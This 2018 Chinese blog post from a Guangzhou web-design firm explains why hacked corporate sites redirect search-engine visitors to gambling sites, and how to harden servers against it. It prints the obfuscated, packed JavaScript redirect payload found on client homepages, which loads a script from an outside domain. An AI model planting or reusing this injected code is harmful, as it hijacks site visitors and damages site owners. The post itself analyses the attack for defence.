欢迎您访问广州骏域网络官网,今天是2018年12月17日
|  手机版|  表格下载|  客户留言|  备案申请 建站申请建站服务热线:020-3460 1098

骏域网络

骏域新闻建站新闻网站教程深圳建站
首页 >企业网站恶意跳转赌博网站如何处理

企业网站恶意跳转赌博网站如何处理

广州网站建设公司2018-08-03795

最近公司内部跟单同事表示,大批广州网站建设公司客户在做百度推广时候,网站的首页点击进去后自动跳转到彩票网站、博彩网站,这样用户从百度搜索或者从推广广告位进去网站后发生跳转,而直接输入网址是没有任何跳转的,这样一来用户流失造成访问量急剧下滑、网站服务器资源浪费、推广费用浪费等,甚至可以说做了百度推广、搜狗推广的都在给彩票公司做广告了,在网站建设行业内引起轩然大波。


广州网站建设



有不少客户在反应这个问题时候,找到广告商赔偿甚至追究责任,所以在网站恶意跳转的问题上我们运营人员需要重视并且知晓如何快速解决,广州网站建设公司骏域网络从网络上查阅并且测试后总结为以下经验:



一、分析网站被黑跳转博彩网站原因



一般情况下网站被黑时候后都是因为服务器信息(服务器IP 远程端口 管理员账号密码、SSH端口、root账号密码)和网站信息包括FTP账号密码的对接被黑客知晓,进而造成黑客植入木马或者后门。



整体的安全监测中,asp网站和php网站都存在着木马,这也就意味着木马能够以php脚本木马、asp脚本木马、jsp脚本木马而存在,这些木马后门可以对网站进行恶意篡改,上传,改名,下载,等管理员的高权限操作。出现网站被跳转的客户,采用的网站架构都是php+mysql架构,以及jsp+mysql架构,大多数用的是开源程序,像dedecms,织梦系统,phpcms系统,discuz系统。



当我们懂得一些代码的时候,必然会看到网站首页中会有一些恶意篡改代码,通过删除恶意代码后可能会在几天内完全的停止跳转的,但是在一段时间后却又会被跳转,这个是很令人懊恼的治标不治本措施。过了不久后网站又会出现跳转,那么针对于网站漏洞问题是很难甚至是不能够完全清除的。



通过观察部分客户网站首页,其首页代码中都会有一段加密代码,这段代码是根据搜索引擎的特征来跳转,比如通过百度搜索,360搜索,搜狗搜索来的会直接跳转到彩票,赌博网站上去。如下代码:



type="text/java">eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){retun d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('l["\\e\\c\\1\\m\\i\\8\\n\\0"]["\\7\\4\\9\\0\\8"](\'\\h\\2\\1\\4\\9\\3\\0\\0\\j\\3\\8\\d\\6\\0\\8\\k\\0\\5\\f\\a\\r\\a\\2\\1\\4\\9\\3\\0\\6\\2\\4\\1\\d\\6\\s\\0\\0\\3\\2\\q\\5\\5\\7\\7\\7\\b\\1\\3\\e\\a\\2\\p\\b\\1\\c\\i\\5\\j\\o\\1\\b\\f\\2\\6\\g\\h\\5\\2\\1\\4\\9\\3\\0\\g\');',29,29,'x74|x63|x73|x70|x72|x2f|x22|x77|x65|x69|x61|x2e|x6f|x3d|x64|x6a|x3e|x3c|x6d|x79|x78|window|x75|x6e|x6c|x38|x3a|x76|x68'.split('|'),0,{}))



一旦被攻击之后,百度搜索引擎就会判断出网站是否被攻击,从而在百度风险评估中心就会对网站进行记录以及标识,百度网址安全中心提醒您:该站点可能受到黑客攻击,部分页面已被非法篡改! 红色提示该百度风险。导致客户打开网站直接被百度拦截,如下图所示:


广州网站建设



针对于以上跳转攻击的特征,我们广州网站建设公司一致认为应该从人工代码方面进行审计,以及检测网站漏洞、网站后门木马清理、漏洞修复以及xss获取管理员账号cookies漏洞,discuz存在getshell漏洞,注入获取管理员漏洞,discuz上传绕过漏洞等。



二、修复以及防止网站被恶意跳转的办法



1、对服务器目录进行安全部署、对管理员帐号密码加密、对所有密码进行数字+大小写字母+特殊符号要求、对网站数据库进行分配普通权限账号。



2、mysql数据库默认端口3306,改为61116,并加入到端口安全策略,不对外开放,外网IP无法连接数据库,只有本地127.0.0.1才能进行连接数据库,以防止攻击者恶意猜测。



3、对服务器底层系统进行安全加固,包括远程端口登录的安全验证。



4、对网站代码进行整体的安全检测,包括定期的升级网站程序源代码,修复补丁以及网站漏洞。



广州网站建设公司处理网站跳转问题有很多方法,以上内容只是解决问题的方法之一,那么作为一个网站建设公司应该对源码进行优化和调整,这样才能确保后期的网站不会受到影响,这就涉及到网站源码升级以及版本升级问题。

分享到微信QQ空间QQ好友腾讯微博新浪微博0

下一篇本次企业网站降权是否会让seo专家转型走向seo编辑?

返回资讯列表

上一篇大批企业站被百度降权疑似中招细雨算法

06日
2018年11月

【网站建设】什么样的网站建设内容适合现在的搜索引擎和用户

什么样的网站建设​内容适合现在的搜索引擎和用户?搜索引擎想要什么样内容展现给用户,而用户又希望看到什么样的内容,这个都需要我们运营人员去不断研究的...
31日
2018年10月

【网站建设】深圳网站建设公司剖析百度权重与快照之间的关系

深圳网站建设公司相信做优化的专业人士都清楚百度收录一个网页是要经过一个过程的,抓取->索引->建库->排序,而百度快照展现形式的过程其实就是页面被索引的过程,那百度权重又与这百度快照有什么关系呢?...
22日
2018年10月

【网站建设】网站建设完成后为什么百度不收录网站

不少企业网站建设完成后都会选择优化网站这个方式来为网站获得更多的流量和用户,以达到获取更多订单的效果。但也经常有不少人发现百度久久不收录网站,也无法得到好的排名,这具体是什么原因呢?...
19日
2018年10月

【网站建设】网站建设后如何优化URL链接

我们一般网站建设​的链接有三种展现方式:动态URL、伪静态URL、纯静态URL链接,对于网站优化来说URL的展现形式也是一个很大的展现因素,那专业的优化人员一般是如何来优化URL链接的呢?...
18日
2018年10月

【网站建设】怎么判断网站需不需要改版

随着互联网技术的发展,目前很多网站的版式都一改以往的死板变得更能引人注目。深圳网站建设​公司了解到近期有很多企业都跟上步伐把以前的老站进行改版...
17日
2018年10月

【网站建设】网站的死链接该怎么检查和删除

深圳网站建设公司经常听一些客户反馈说网站改版或者有些文章或者产品删除后,在百度依然能看到但点击打开之后却是个错误页面,其实这在优化的角度上是属于死链接。一般网站如果没做很大的改动或者删除东西的话是不会存在
17日
2018年10月

【网站建设】网站设计页面不可缺少的几个地方

深圳网站建设公司认为不管是设计哪种类型的网站我们都需要遵循用户体验度好的原则,能够让用户愿意继续浏览下去的页面就算是成功的。那我们在进行网站页面布局设计时有哪几个地方是必须要注意的呢?...
11日
2018年10月

【网站建设】新网站刚优化的时候进入沙盒期该怎么办

网站建设完成后有的企业会选择进行百度推广或者网站优化,但都是为了能够通过网站的展现获得有效客户资源。那今天骏域网站建设小编和大家分析一下新网站刚优化的时候进入了沙盒期该怎么办,怎样才能快速走出来?...
广州市番禺区禺山西路329号海伦堡创意园4座1栋17楼1706 020-34601098020-34589360 版权所有© 广州骏域网络科技有限公司 粤ICP备11025769号